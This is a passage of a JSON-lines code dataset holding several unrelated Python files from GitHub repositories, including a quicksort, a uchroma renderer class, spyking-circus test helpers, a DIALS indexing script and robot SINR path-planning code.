[]\n\n def dfs(c):\n if c in visit:\n return visit[c]\n visit[c] = True\n for neighbor in adj[c]:\n if dfs(neighbor):\n return True\n visit[c] = False\n res.append(c)\n\n for c in adj:\n if dfs(c):\n return \"\"\n\n res = res[::-1]\n return \"\".join(res)\n\nX = Solution()\nprint(X.alienOrder([\"wrt\",\"wrf\",\"er\",\"ett\",\"rftt\"]))","repo_name":"anugrah18/Leetcode_solutions","sub_path":"Graphs/269-AlienDictionary.py","file_name":"269-AlienDictionary.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35879972272","text":"# =============================================================================\n# A class called Grid to define the partition of the 1-d space domain.\n# =============================================================================\n\nimport numpy as np\n\nclass Grid(object):\n \"Store all grid data and calculates dx and x locations.\"\n \"The grid is assumed periodic. \"\n \"Inputs are nx number of points(including end point) and Length the length\" \n \n def __init__(self, nx, Length , xmin=0.0):\n \n self.xmin = xmin\n self.length =np.float64(Length)\n self.xmax = xmin + Length \n self.nx = int(nx)\n # The x locations, including the end point\n self.x = np.linspace(self.xmin, self.length, self.nx)\n # The dx length of the partition\n self.dx =self.x[1]-self.x[0]\n \n\n\n","repo_name":"ESaggioro/FinalCode","sub_path":"Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2852536803","text":"import matplotlib as mpl\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation, rc, cm\nfrom IPython.display import HTML\nimport mpl_toolkits.mplot3d.axes3d as p3\n\ndef animate(xx, yy, u):\n \n mpl.rcParams['figure.dpi']= 120 # Animation Size\n rc('animation', html='html5')\n z_max = np.max(np.max(u))\n def update_lines(num, u, N, frames):\n\n print(\"%i / 50 Frames loaded\" %(num+1), end='\\r')\n ax.clear()\n ax.set_zlim3d([0.0, z_max])\n line = ax.plot_surface(xx,yy,u[int(N/frames)*num], cmap=cm.coolwarm)\n return line,\n \n fig = plt.figure()\n ax = p3.Axes3D(fig)\n plt.close()\n line = ax.plot_surface(xx,yy,u[0])\n \n # Animation Parameters\n N = np.size(u[:,0,0]) # Number of Timesteps\n T = 5\n if N<50:\n frames = N\n else:\n frames = 50 # Number of Frames\n \n interval = T/frames*1000 # Time between Frames in ms\n \n ax.set_zlim3d([0.0, z_max])\n anim = animation.FuncAnimation(fig, update_lines,fargs = (u, N, frames),\n frames=frames, interval=interval, blit=True)\n return anim\n","repo_name":"AaronStra/BEC","sub_path":"ani_bose_2d.py","file_name":"ani_bose_2d.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2445087954","text":"import asyncio\n\nfrom abc import abstractmethod\nfrom typing import NamedTuple\n\nfrom traitlets import Bool, CaselessStrEnum, HasTraits, Float, Int, observe, Unicode\n\nfrom uchroma.blending import BlendOp\nfrom uchroma.input_queue import InputQueue\nfrom uchroma.layer import Layer\nfrom uchroma.log import Log\nfrom uchroma.traits import ColorTrait, DefaultCaselessStrEnum, WriteOnceInt\nfrom uchroma.util import Ticker\n\n\nMAX_FPS = 30\nDEFAULT_FPS = 15\nNUM_BUFFERS = 2\n\n\nRendererMeta = NamedTuple('RendererMeta', [('display_name', str), ('description', str),\n ('author', str), ('version', str)])\n\n\n\nclass Renderer(HasTraits, object):\n \"\"\"\n Base class for custom effects renderers.\n \"\"\"\n\n # traits\n meta = RendererMeta('_unknown_', 'Unimplemented', 'Unknown', '0')\n\n fps = Float(min=0.0, max=MAX_FPS, default_value=DEFAULT_FPS).tag(config=True)\n blend_mode = DefaultCaselessStrEnum(BlendOp.get_modes(), default_value='screen',\n allow_none=False).tag(config=True)\n opacity = Float(min=0.0, max=1.0, default_value=1.0).tag(config=True)\n background_color = ColorTrait().tag(config=True)\n\n height = WriteOnceInt()\n width = WriteOnceInt()\n zindex = Int(default_value=-1)\n running = Bool(False)\n\n\n def __init__(self, driver, *args, **kwargs):\n self._avail_q = asyncio.Queue(maxsize=NUM_BUFFERS)\n self._active_q = asyncio.Queue(maxsize=NUM_BUFFERS)\n\n self.running = False\n\n self.width = driver.width\n self.height = driver.height\n\n self._tick = Ticker(1 / DEFAULT_FPS)\n\n self._input_queue = None\n if hasattr(driver, 'input_manager') and driver.input_manager is not None:\n self._input_queue = InputQueue(driver)\n\n self._logger = Log.get('uchroma.%s.%d' % (self.__class__.__name__, self.zindex))\n super(Renderer, self).__init__(*args, **kwargs)\n\n\n @observe('zindex')\n def _z_changed(self, change):\n if change.old == change.new and change.new >= 0:\n return\n\n self._logger = Log.get('uchroma.%s.%d' % (self.__class__.__name__, change.new))\n\n\n def init(self, frame) -> bool:\n \"\"\"\n Invoked by AnimationLoop when the effect is activated. At this\n point, the traits will have been set. An implementation\n should perform any final setup here.\n\n :param frame: The frame instance being configured\n\n :return: True if the renderer was configured\n \"\"\"\n return False\n\n\n def finish(self, frame ):\n \"\"\"\n Invoked by AnimationLoop when the effect is deactivated.\n An implementation should perform cleanup tasks here.\n\n :param frame: The frame instance being shut down\n \"\"\"\n pass\n\n\n @abstractmethod\n async def draw(self, layer: Layer, timestamp: float) -> bool:\n \"\"\"\n Coroutine called by AnimationLoop when a new frame needs\n to be drawn. If nothing should be drawn (such as if keyboard\n input is needed), then the implementation should yield until\n ready.\n\n :param layer: Layer to draw\n :param timestamp: The timestamp of this frame\n\n :return: True if the frame has been drawn\n \"\"\"\n return False\n\n\n @property\n def has_key_input(self) -> bool:\n \"\"\"\n True if the device is capable of producing key events\n \"\"\"\n return self._input_queue is not None\n\n\n @property\n def key_expire_time(self) -> float:\n \"\"\"\n Gets the duration (in seconds) that key events will remain\n available.\n \"\"\"\n return self._input_queue.expire_time\n\n\n @key_expire_time.setter\n def key_expire_time(self, expire_time: float):\n \"\"\"\n Set the duration (in seconds) that key events should remain\n in the queue for. This allows the renderer to act on groups\n of key events over time. If zero, events are not kept after\n being dequeued.\n \"\"\"\n self._input_queue.expire_time = expire_time\n\n\n async def get_input_events(self):\n \"\"\"\n Gets input events, yielding until at least one event is\n available. If expiration is not enabled, this returns\n a single item. Otherwise a list of all unexpired events\n is returned.\n \"\"\"\n if not self.has_key_input or not self._input_queue.attach():\n raise ValueError('Input events are not supported for this device')\n\n events = await self._input_queue.get_events()\n return events\n\n\n @observe('fps')\n def _fps_changed(self, change):\n self._tick.interval = 1 / self.fps\n\n\n @property\n def logger(self):\n \"\"\"\n The logger for this instance\n \"\"\"\n return self._logger\n\n\n def _free_layer(self, layer):\n \"\"\"\n Clear the layer and return it to the queue\n\n Called by AnimationLoop after a layer is replaced on the\n active list. Implementations should not call this directly.\n \"\"\"\n layer.lock(False)\n layer.clear()\n self._avail_q.put_nowait(layer)\n\n\n async def _run(self):\n \"\"\"\n Coroutine which dequeues buffers for drawing and queues them\n to the AnimationLoop when drawing is done.\n \"\"\"\n if self.running:\n return\n\n self.running = True\n\n while self.running:\n async with self._tick:\n # get a buffer, blocking if necessary\n layer = await self._avail_q.get()\n layer.background_color = self.background_color\n layer.blend_mode = self.blend_mode\n layer.opacity = self.opacity\n\n try:\n # draw the layer\n status = await self.draw(layer, asyncio.get_event_loop().time())\n except Exception as err:\n self.logger.exception(\"Exception in renderer, exiting now!\", exc_info=err)\n self.logger.error('Renderer traits: %s', self._trait_values)\n break\n\n if not self.running:\n break\n\n # submit for composition\n if status:\n layer.lock(True)\n await self._active_q.put(layer)\n\n await self._stop()\n\n\n def _flush(self):\n if self.running:\n return\n for qlen in range(0, self._avail_q.qsize()):\n self._avail_q.get_nowait()\n for qlen in range(0, self._active_q.qsize()):\n self._active_q.get_nowait()\n\n\n async def _stop(self):\n if not self.running:\n return\n\n self.running = False\n\n self._flush()\n\n if self.has_key_input:\n await self._input_queue.detach()\n\n self.logger.info(\"Renderer stopped: z=%d\", self.zindex)\n","repo_name":"cyanogen/uchroma","sub_path":"uchroma/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"67"} +{"seq_id":"34302768634","text":"def quicksort(x):\n \"\"\"\n Sorts the given list, returns a new list with all objects in order\n\n :param x: List to be sorted\n :type x: list\n :rtype : list\n \"\"\"\n\n assert isinstance(x, list), \"input should be a list\"\n\n def _choose_pivot(m_list, left, right):\n \"\"\"\n Chooses a pivot index in the given (restricted) list using the best of 3 method\n\n :return: index of chosen pivot\n \"\"\"\n front = m_list[left]\n back = m_list[right]\n mid = m_list[(right+1-left)//2]\n\n if mid <= front <= back or back <= front <= mid:\n return left\n if front <= mid <= back or back <= mid <= front:\n return (right+1-left)//2\n return right\n\n def _partition(m_list, p, left, right):\n \"\"\"\n Partitions m_list and returns an index i such that all items left of index i are <= m_list[i], and all\n items to the right of index i are >= m_list[i]. (We don't consider anything before left or after right)\n\n :param m_list: List to be partitioned\n :param p: index of pivot to be used\n :return: new index of the pivot\n \"\"\"\n m_list[p], m_list[right] = m_list[right], m_list[p] # swap pivot to the end\n i = left\n j = right-1\n v = m_list[right]\n while True:\n while i < right and m_list[i] <= v:\n i += 1\n while j > left and m_list[j] >= v:\n j -= 1\n if i >= j:\n break\n m_list[i], m_list[j] = m_list[j], m_list[i]\n m_list[i], m_list[right] = m_list[right], m_list[i] # swap pivot back to \"middle\"\n return i\n\n def _sort(m_list, left, right):\n if left >= right:\n return\n pivot_index = _choose_pivot(m_list, left, right)\n i = _partition(m_list, pivot_index, left, right)\n _sort(m_list, left,i-1)\n _sort(m_list, i+1, right)\n\n # This is my first attempt - inefficient use of space\n\n # def _sort(m_list):\n # if len(m_list) < 2:\n # return m_list\n # # initialize new lists and make the middle to be the pivot\n # pivot = m_list[len(m_list) // 2]\n # smaller, same, larger = [], [], []\n # for i in range(len(m_list)):\n # if m_list[i] < pivot:\n # smaller.append(m_list[i])\n # elif m_list[i] > pivot:\n # larger.append(m_list[i])\n # else:\n # same.append(m_list[i])\n #\n # return _sort(smaller) + same + _sort(larger)\n\n _sort(x, 0, len(x)-1)\n","repo_name":"HavinLeung/Data-Structures-Algorithms","sub_path":"Algorithms/Sorting/QuickSort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12032882722","text":"\"\"\"plot_traces.py\nBEFORE RUNNING THIS: run count_backwards.py\n\n1. Plot traces for each fly averaged throughout the iterations\n (`glob_ = False`).\n2. Plot traces averaged throughtout the iterations and flies for each gene\n (`glob_ = True`).\n\"\"\"\n\nimport torch\nimport glob\nfrom matplotlib import pyplot as plt\n\ndata_folder = \"data/orig/\"\npics_folder = \"pics/\"\n\ntitles = [\"ImpTNT\", \"GFP\", \"ShalRNAi\", \"Dorsal\", \"TNT\", \"EagDN\", \"Hunchback\"]\n\nglob_ = True\n\nwith plt.style.context(\"bmh\"):\n # For each gene\n for i in range(7):\n fname = next(\n glob.iglob(data_folder + \"{:02}*/fly_moves.pt\".format(i + 1)))\n\n # Size: N_flies x N_iters x N_frames\n fly_moves = torch.load(fname).type(torch.float)\n\n c_1 = list(plt.rcParams['axes.prop_cycle'])[1]['color']\n c_2 = list(plt.rcParams['axes.prop_cycle'])[8]['color']\n\n plt.fill_between(range(40, 91), -1, 1, alpha=0.2, color=c_2)\n\n plt.axhline(0, 0, 120, c=\"gray\", linewidth=1.0, linestyle='--')\n\n if glob_:\n mean = fly_moves.mean(1).mean(0).numpy()[2:-8]\n std = fly_moves.std(1).mean(0).numpy()[2:-8]\n #print(len(mean))\n\n plt.plot(mean, c=c_1)\n\n plt.fill_between(\n range(len(mean)),\n mean - std, mean + std,\n alpha=0.1, color=c_1\n )\n plt.plot(mean - std, c=c_1, linewidth=0.7, alpha=0.3)\n plt.plot(mean + std, c=c_1, linewidth=0.7, alpha=0.3)\n\n else:\n for j in range(fly_moves.size(0)):\n mean = fly_moves.mean(1)[j].numpy()[2:-8]\n std = fly_moves.std(1)[j].numpy()[2:-8]\n #print(len(mean))\n\n plt.plot(mean, label=j)\n\n \"\"\"\n plt.fill_between(\n range(len(mean)),\n mean - std, mean + std,\n alpha=0.1, color=c_1)\n plt.plot(mean - std, c=c_1, linewidth=0.7, alpha=0.3)\n plt.plot(mean + std, c=c_1, linewidth=0.7, alpha=0.3)\n \"\"\"\n\n plt.ylim(-1, 1)\n locs, labels = plt.yticks(\n [-0.5, 0, 0.5], [\"Backward\", \"Still\", \"Forward\"], rotation=90)\n plt.xticks([0, 20, 40, 60, 80, 100], [-4, -2, 0, 2, 4, 6])\n for label in labels:\n label.set_verticalalignment('center')\n\n plt.ylabel(\"Movement\")\n plt.xlabel(\"Seconds\")\n\n if glob_:\n plt.title(titles[i] + \": Global Mean ± Std\")\n else:\n plt.title(titles[i])\n\n #plt.show()\n if glob_:\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \"_glob_avg_std.pdf\", dpi=300)\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \"_glob_avg_std.png\", dpi=300)\n else:\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \".pdf\", dpi=300)\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \".png\", dpi=300)\n plt.close()\n","repo_name":"utanashati/cobar-flies","sub_path":"plot_traces.py","file_name":"plot_traces.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39963230872","text":"import os, sys, nose, h5py\nimport circus\nimport subprocess\nimport urllib.request, urllib.error, urllib.parse\nimport unittest\nimport colorama\ncolorama.init(autoreset=True)\nfrom colorama import Fore, Back, Style\nimport shutil\nimport pkg_resources\nfrom circus.shared.utils import *\nfrom circus.shared.parser import CircusParser\n \n\ndef run():\n dirname = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n # We write to stderr since nose does all of its output on stderr as well\n sys.stderr.write('Running tests in \"%s\" ' % dirname)\n success = []\n argv = ['nosetests', dirname]\n success.append(nose.run(argv=argv))\n all_success = all(success)\n if not all_success:\n sys.stderr.write(('ERROR: %d/%d test suite(s) did not complete '\n 'successfully (see above).\\n') % (len(success) - sum(success),\n len(success)))\n else:\n sys.stderr.write(('OK: %d/%d test suite(s) did complete '\n 'successfully.\\n') % (len(success), len(success)))\n\ndef mpi_launch(subtask, filename, nb_cpu, nb_gpu, use_gpu, output=None, benchmark=None, sim_same_elec=None):\n args = ['mpirun'] \n \n from mpi4py import MPI\n vendor = MPI.get_vendor()\n if vendor[0] == 'Open MPI':\n args = ['mpirun']\n if os.getenv('LD_LIBRARY_PATH'):\n args += ['-x', 'LD_LIBRARY_PATH']\n if os.getenv('PATH'):\n args += ['-x', 'PATH']\n if os.getenv('PYTHONPATH'):\n args += ['-x', 'PYTHONPATH']\n elif vendor[0] == 'Microsoft MPI':\n args = ['mpiexec']\n elif vendor[0] == 'MPICH2':\n mpi_args = ['mpiexec']\n elif vendor[0] == 'MPICH':\n mpi_args = ['mpiexec']\n \n if use_gpu == 'True':\n nb_tasks = str(nb_gpu)\n else:\n nb_tasks = str(nb_cpu)\n\n if subtask in ['merging', 'converting']:\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu, '']\n else:\n if subtask == 'benchmarking':\n if (output is None) or (benchmark is None):\n print(\"To generate synthetic datasets, you must provide output and type\")\n sys.exit(1)\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu, output, benchmark, str(sim_same_elec)]\n else:\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu]\n \n\n subprocess.check_call(args)\n\n\ndef get_dataset(self):\n dirname = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n filename = os.path.join(dirname, 'data') \n if not os.path.exists(filename):\n os.makedirs(filename)\n result = os.path.join(filename, 'data')\n filename = os.path.join(filename, 'data.dat')\n if not os.path.exists(filename):\n print(\"Generating a synthetic dataset of 4 channels, 1min at 20kHz...\")\n sampling_rate = 20000\n N_total = 4\n gain = 0.5\n data = (gain * numpy.random.randn(sampling_rate * N_total * 1 * 60)).astype(numpy.float32)\n myfile = open(filename, 'w')\n myfile.write(data.tostring())\n myfile.close() \n \n src_path = os.path.abspath(os.path.join(dirname, 'snippet'))\n\n if not os.path.exists(result):\n os.makedirs(result)\n shutil.copy(os.path.join(src_path, 'test.basis.hdf5'), os.path.join(result, 'data.basis.hdf5'))\n shutil.copy(os.path.join(src_path, 'test.templates.hdf5'), os.path.join(result, 'data.templates.hdf5'))\n shutil.copy(os.path.join(src_path, 'test.clusters.hdf5'), os.path.join(result, 'data.clusters.hdf5'))\n\n config_file = os.path.abspath(pkg_resources.resource_filename('circus', 'config.params'))\n file_params = os.path.abspath(filename.replace('.dat', '.params'))\n if not os.path.exists(file_params):\n \n shutil.copyfile(config_file, file_params)\n probe_file = os.path.join(src_path, 'test.prb')\n parser = CircusParser(filename, mapping=probe_file)\n parser.write('data', 'file_format', 'raw_binary')\n parser.write('data', 'data_offset', '0')\n parser.write('data', 'data_dtype', 'float32')\n parser.write('data', 'sampling_rate', '20000')\n parser.write('whitening', 'temporal', 'False')\n parser.write('data', 'mapping', probe_file)\n parser.write('clustering', 'make_plots', 'png')\n parser.write('clustering', 'nb_repeats', '3')\n parser.write('detection', 'N_t', '3')\n parser.write('clustering', 'smart_search', 'False')\n parser.write('clustering', 'max_elts', '10000')\n parser.write('noedits', 'filter_done', 'True')\n parser.write('clustering', 'extraction', 'median-raw')\n\n a, b = os.path.splitext(os.path.basename(filename))\n c, d = os.path.splitext(filename)\n file_out = os.path.join(os.path.abspath(c), a)\n\n return filename\n\nif __name__=='__main__':\n run()\n","repo_name":"spyking-circus/spyking-circus","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"67"} +{"seq_id":"520799139","text":"#! /usr/bin/env python3\n# coding=utf-8\n\"\"\"\"\"\"\n\"\"\"\nAuthor: radenz@tropos.de\n\nhelper functions for the geography calculation\n\"\"\"\n\nimport math\n\ndef calculate_initial_angle(pointA, pointB):\n \"\"\"\n Calculates the bearing between two points.\n The formulae used is the following:\n θ = atan2(sin(Δlong).cos(lat2),\n cos(lat1).sin(lat2) − sin(lat1).cos(lat2).cos(Δlong))\n\n source: https://gist.github.com/jeromer/2005586\n\n initial_bearing = math.degrees(initial_bearing)\n compass_bearing = (initial_bearing + 360) % 360\n\n :Parameters:\n - `pointA: The tuple representing the latitude/longitude for the\n first point. Latitude and longitude must be in decimal degrees\n - `pointB: The tuple representing the latitude/longitude for the\n second point. Latitude and longitude must be in decimal degrees\n :Returns:\n The bearing in degrees\n :Returns Type:\n float\n \"\"\"\n if (type(pointA) != tuple) or (type(pointB) != tuple):\n raise TypeError(\"Only tuples are supported as arguments\")\n\n lat1 = math.radians(pointA[0])\n lat2 = math.radians(pointB[0])\n\n diffLong = math.radians(pointB[1] - pointA[1])\n\n x = math.sin(diffLong) * math.cos(lat2)\n y = math.cos(lat1) * math.sin(lat2) - (math.sin(lat1)\n * math.cos(lat2) * math.cos(diffLong))\n\n initial_bearing = math.atan2(x, y)\n\n # Now we have the initial bearing but math.atan2 return values\n # from -180° to + 180° which is not what we want for a compass bearing\n # The solution is to normalize the initial bearing as shown below\n\n #print((math.degrees(initial_bearing) + 360) % 360)\n return initial_bearing\n\n\ndef distance(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371 # km\n\n dlat = math.radians(lat2-lat1)\n dlon = math.radians(lon2-lon1)\n a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \\\n * math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n d = radius * c\n\n return d","repo_name":"martin-rdz/trace_airmass_source","sub_path":"trace_source/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"30428240661","text":"from __future__ import absolute_import, division\nfrom __future__ import print_function\nfrom dxtbx.model.experiment_list import ExperimentList\nfrom dials.util.options import flatten_reflections\nfrom dials.array_family import flex\nfrom dials.command_line.show import beam_centre_mm\nfrom libtbx import phil\nfrom libtbx import easy_run\nfrom libtbx.utils import Sorry\nfrom libtbx.table_utils import simple_table\nimport os\nfrom math import sqrt\n\nhelp_message = \"\"\"\n\nIndex images in a dataset sequentially.\n\nExample::\n\n dev.dials.creep_index indexed.expt strong.refl\n\n\"\"\"\n\nphil_scope = phil.parse(\n \"\"\"\n images_per_block=5\n .type=int\n\n fix_detector_distance=True\n .type=bool\n .help=\"fix the least stable detector parameters for refinement of each\"\n \"small block of images. These are Dist, Tau2 and Tau3.\"\n\"\"\"\n)\n\n\nclass Script(object):\n def __init__(self):\n \"\"\"Check script input\"\"\"\n\n import libtbx.load_env\n from dials.util.options import OptionParser\n\n # The script usage\n usage = (\n \"usage: {0} [options] [param.phil] indexed.expt \" \"strong.refl\"\n ).format(libtbx.env.dispatcher_name)\n\n parser = OptionParser(\n usage=usage,\n phil=phil_scope,\n read_reflections=True,\n read_experiments=True,\n check_format=False,\n epilog=help_message,\n )\n\n params, options = parser.parse_args(show_diff_phil=True)\n\n if len(params.input.experiments) != 1:\n raise Sorry(\"Please provide a single experiment list as input\")\n\n self._current_exp_path = params.input.experiments[0].filename\n\n el = params.input.experiments[0].data\n scan = el.scans()\n if len(scan) != 1:\n raise Sorry(\"Currently only a single scan is supported\")\n self._scan = scan[0]\n\n reflections = flatten_reflections(params.input.reflections)\n if len(reflections) > 1:\n raise Sorry(\"Please provide a single reflection table as input\")\n\n self._strong_path = params.input.reflections[0].filename\n self._num_strong = len(params.input.reflections[0].data)\n print(\n \"{0} strong spots read from {1}\".format(self._num_strong, self._strong_path)\n )\n\n self._images_per_block = params.images_per_block\n self._constrain_detector = params.fix_detector_distance\n\n self._all_indexed = None\n return\n\n def _index_current_block(self, job_id, start, stop):\n\n fmt_dic = {\n \"experiments\": self._current_exp_path,\n \"indexed\": self._strong_path,\n \"start\": start,\n \"stop\": stop,\n \"job_id\": job_id,\n }\n\n cmd = (\n \"dials.index {experiments} {indexed} \"\n \"image_range={start},{stop} \"\n \"output.experiments=latest_indexed.expt \"\n \"output.reflections=indexed_{job_id:03d}.refl \"\n \"output.log=None \"\n ).format(**fmt_dic)\n if self._constrain_detector:\n cmd += \" detector.fix=distance\"\n result = easy_run.fully_buffered(command=cmd)\n\n # check if indexing worked\n new_exp_path = \"latest_indexed.expt\"\n indexed_path = \"indexed_{job_id:03d}.refl\".format(**fmt_dic)\n tst = [os.path.exists(e) for e in (new_exp_path, indexed_path)]\n if tst.count(True) != 2:\n return (None, None)\n return new_exp_path, indexed_path\n\n def __call__(self):\n\n # set up variables we need to determine blocks\n first, last = self._scan.get_image_range()\n start = first\n stop = first\n\n # set up table\n header = [\n \"Job\",\n \"Scan\\nrange\",\n \"#Idx\",\n \"Cell\",\n \"Beam centre\\n(fast,slow)\",\n \"Distance\\n(mm)\",\n \"RMSD_X\\n(px)\",\n \"RMSD_Y\\n(px)\",\n \"RMSD_Z\\n(px)\",\n ]\n rows = []\n num_indexed = []\n filelist_lines = []\n job_id = 1\n\n while True:\n\n # finish if we already processed all blocks\n if stop == last:\n break\n\n # keep trying to index, extending the block size looking for success\n nblocks = 1\n while True:\n stop = start + nblocks * self._images_per_block\n # if within one block size from the end, include all images up to the end\n if stop >= last - self._images_per_block:\n stop = last\n new_exp_path, indexed_path = self._index_current_block(\n job_id, start, stop\n )\n # exit if successful indexing\n if [new_exp_path, indexed_path].count(None) == 0:\n break\n # exit if no more data to include\n if stop == last:\n break\n nblocks += 1\n\n # exit if the last job failed\n if new_exp_path is None:\n break\n\n # it worked, so update the pointer to the current model\n self._current_exp_path = new_exp_path\n print(\"Job {0} completed: scan range ({1},{2})\".format(job_id, start, stop))\n\n # load the indexed results\n el = ExperimentList.from_file(self._current_exp_path, check_format=False)\n assert len(el) == 1\n exp = el[0]\n\n rt = flex.reflection_table.from_file(indexed_path)\n if self._all_indexed is None:\n self._all_indexed = rt\n else:\n rt.experiment_identifiers()[\n 0\n ] = self._all_indexed.experiment_identifiers()[0]\n self._all_indexed.extend(rt)\n\n indexed = rt.select(rt.get_flags(rt.flags.indexed))\n num_indexed.append(len(indexed))\n panel_id, (x, y) = beam_centre_mm(exp.detector, exp.beam.get_s0())\n bc = exp.detector[panel_id].millimeter_to_pixel((x, y))\n indexed_rmsds = self._rmsds(indexed)\n cell = exp.crystal.get_unit_cell().parameters()\n pnl_dists = [p.get_distance() for p in exp.detector]\n rows.append(\n [\n \"{0}\".format(job_id),\n \"({0},{1})\".format(start, stop),\n \"%i\" % num_indexed[-1],\n \"%.2f %.2f %.2f %.2f %.2f %.2f\" % cell,\n \"%.2f %.2f\" % bc,\n (\" \".join([\"%.2f\" % d for d in pnl_dists])),\n \"%.4f\" % indexed_rmsds[0],\n \"%.4f\" % indexed_rmsds[1],\n \"%.4f\" % indexed_rmsds[2],\n ]\n )\n\n # update the scan range in the experiments and save\n for exp in el:\n exp.scan.swap(exp.scan[start:stop])\n el.as_json(\"indexed_{0:03d}.expt\".format(job_id))\n filelist_lines.append(\n \"block{0:03d} indexed_{0:03d}.expt \".format(job_id) + indexed_path\n )\n\n # set up for the next block\n start = stop\n job_id += 1\n\n # print results\n st = simple_table(rows, header)\n print(st.format())\n total_num_indexed = sum(num_indexed)\n print(\n \"{0} indexed reflections out of {1} strong spots ({2:.1f}%)\".format(\n total_num_indexed,\n self._num_strong,\n 100.0 * total_num_indexed / self._num_strong,\n )\n )\n\n # write out the list of files\n print(\"writing out list of experiments and indexed reflections to filelist.txt\")\n with open(\"filelist.txt\", \"w\") as f:\n f.write(\"\\n\".join(filelist_lines))\n f.write(\"\\n\")\n\n # write out the full reflection table of indexed reflections\n print(\"writing out all indexed reflections to all_indexed.refl\")\n self._all_indexed.as_pickle(\"all_indexed.refl\")\n\n def _rmsds(self, reflections):\n \"\"\"calculate unweighted RMSDs for the specified reflections\"\"\"\n\n # Only calculate RMSDs on the reflections used in refinement\n reflections = reflections.select(\n reflections.get_flags(reflections.flags.used_in_refinement)\n )\n x_calc, y_calc, z_calc = reflections[\"xyzcal.px\"].parts()\n x_obs, y_obs, z_obs = reflections[\"xyzobs.px.value\"].parts()\n\n x_resid2 = (x_calc - x_obs) ** 2\n y_resid2 = (y_calc - y_obs) ** 2\n z_resid2 = (z_calc - z_obs) ** 2\n\n resid_x = flex.sum(x_resid2)\n resid_y = flex.sum(y_resid2)\n resid_z = flex.sum(z_resid2)\n n = len(reflections)\n\n rmsds = (sqrt(resid_x / n), sqrt(resid_y / n), sqrt(resid_z / n))\n return rmsds\n\n\nif __name__ == \"__main__\":\n\n run = Script()\n run()\n","repo_name":"dials/dials_scratch","sub_path":"command_line/creep_index.py","file_name":"creep_index.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1984038092","text":"#SINR_mapping\nimport networkx as nx\nimport numpy as np\nfrom numpy.core.numeric import NaN\nimport random\nimport setting\n#Input parameter\n# SINR_Constraint=8\n# D=100\n# Lambda=3\n# destination=20\n# AdaptionSpeed=1\n# UpperBoundMRC=10\nclass GraphRobot:\n\n def __init__(self,vertices):\n self.V=vertices\n self.graph=[]\n self.path=[]\n self.M={}\n self.Obstacle=[]\n #self.obstacle(NumofObstacle)\n\n #remove the edge bump into obstacle\n def obstacleAvoidance(self,Obstacle):\n for i in Obstacle:\n self.graph=[[v1,v2,sickness,SINR,edgeLength,MRC] for v1,v2,sickness,SINR,edgeLength,MRC\\\n in self.graph if(v1!=i and v2!=i)]\n\n #remove the edge which exceed MRC upper bound\n def upperbound(self,UpperBoundMRC):\n self.graph=[[v1,v2,sickness,SINR,edgeLength,MRC] for v1,v2,sickness,SINR,edgeLength,MRC\\\n in self.graph if(MRCSINR_Constraint:\n # #self.graph.sickness=float(\"Inf\")\n # self.graph.remove([v1,v2,sickness,SINR,edgeLength,MRC])\n # self.graph.append([v1,v2,float(\"Inf\"),SINR,edgeLength])\n #initialize\n Qfunction=[float(\"Inf\")]*self.V\n Qfunction[src]=0\n #\n costFunction=np.zeros((self.V+1,self.V+1))\n costFunction[:][:]=float(\"Inf\")\n costFunction[src][:]=0\n #\n PathLength=[float(\"Inf\")]*self.V\n PathLength[src]=0\n #\n RETmagnitude=[float(\"Inf\")]*self.V\n RETmagnitude[src]=0\n #\n AccumulatedSINR=[float(\"Inf\")]*self.V\n AccumulatedSINR[src]=0\n #\n #Distance=D\n rho=np.zeros(self.V)\n rhoOld=0\n Parent={}\n Parent[src]=-1\n #\n self.obstacleAvoidance(self.Obstacle)\n self.upperbound(setting.UpperBoundMRC)\n #\n x=0\n count=0\n for _ in range(self.V-1):\n for v1,v2,sickness,SINR,edgeLength,MRC in self.graph:\n #from 0 to v1\n #for x in range(v1+1):\n if(PathLength[v1]+edgeLengthdst:\n print(\"no optimal path\") \n \n #SINR configuration\n def SINR_mapping_Robot(self,state):\n #Edge(self,v1,v2,sickness,SINR,edgeLength,MRC):\n #state==v2\n #g.M[str(state)][]\n #M={'0'#location: 